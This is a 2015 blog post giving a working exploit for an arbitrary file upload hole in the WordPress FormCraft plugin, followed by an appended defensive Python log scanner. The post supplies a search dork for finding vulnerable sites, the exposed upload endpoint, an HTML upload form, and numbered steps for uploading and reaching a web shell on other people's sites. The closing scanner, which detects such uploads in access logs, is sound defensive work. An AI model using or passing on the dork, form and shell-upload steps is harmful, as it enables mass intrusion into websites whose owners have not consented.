Saturday, 14 February 2015

WordPress Plugins FormCraft CSRF Vulnerability



Dork : Inurl:/wp-content/plugins/formcraft/


Exploit : http://site.com/wp-content/plugins/formcraft/file-upload/server/php/upload.php

http://site.com/wp-content/plugins/formcraft/file-upload/server/php/


Script CSRF:

<form method="POST" action="http://www.site.com/wp-content/plugins/formcraft/file-upload/server/php/upload.php" enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form>


*Save In HTML File*


1. Find a target using the dork given above.

2. Then open the exploit URL given above.

3. If the site is vulnerable, it will show "No File Upload : 2".

4. Put the vulnerable site's URL in the CSRF script.

5. Open the HTML file using your default browser and upload your shell.


Shell Access : http://site.com/wp-content/plugins/formcraft/file-upload/server/php/files/yourshell.php


Inbox Me If You Do Not Understand

Facebook : www.fb.com/7OBUz

Twitter : www.twitter.com/wazy_MY


Thx To Indonesian CyberFreedom Team
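
For defenders, the requests described in this post leave a recognisable trail in web server access logs. The following is an added example, not part of the original post: it flags requests to the upload.php endpoint and script files requested from the files/ directory, assuming Apache/nginx "combined" log format; the finding names and sample log lines are constructed.

```python
import re
from urllib.parse import unquote

# Paths are the ones named in the post; the "combined" log format is an assumption.
BASE = "/wp-content/plugins/formcraft/file-upload/server/php/"
UPLOAD, FILES = BASE + "upload.php", BASE + "files/"
SCRIPT = re.compile(r"\.(php\d?|phtml|phar)(\.|$)", re.I)  # also catches name.php.txt
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "([A-Z]+) (\S+) [^"]*" (\d{3}) ')

def scan(lines):
    """Return (ip, finding, path) tuples, in log order, for requests worth triage."""
    uploaders, findings = set(), []
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue  # not a combined-format access line
        ip, method, uri, status = m.groups()
        path = unquote(uri.split("?", 1)[0])  # drop query string, decode %xx
        ok = status.startswith("2")           # 2xx only means the server answered
        if path == UPLOAD and method == "POST" and ok:
            uploaders.add(ip)
            findings.append((ip, "upload_accepted", path))
        elif path == UPLOAD:
            findings.append((ip, "upload_probe", path))
        elif path.startswith(FILES) and SCRIPT.search(path[len(FILES):]):
            kind = "script_served" if ok else "script_requested"
            if ip in uploaders:
                kind += "_after_upload"  # same client posted to upload.php earlier
            findings.append((ip, kind, path))
    return findings

def log(ip, method, path, status):
    """Build one constructed combined-format line for the sample below."""
    return (f'{ip} - - [14/Feb/2015:10:00:00 +0000] "{method} {path} HTTP/1.1" '
            f'{status} 128 "-" "Mozilla/5.0"')

SAMPLE = [  # constructed log lines using documentation-range IP addresses
    log("203.0.113.7", "GET", UPLOAD, 200),
    log("203.0.113.7", "POST", UPLOAD, 200),
    log("203.0.113.7", "GET", FILES + "example.php", 200),
    log("198.51.100.9", "GET", FILES + "photo.jpg", 200),
    log("198.51.100.9", "GET", FILES + "notes.php.txt", 404),
    log("198.51.100.9", "GET", "/index.php", 200),
]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(*finding)
```

A `script_served` finding means the server returned a 2xx response for a script file inside the upload directory, so the files in that directory on the host should be reviewed.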


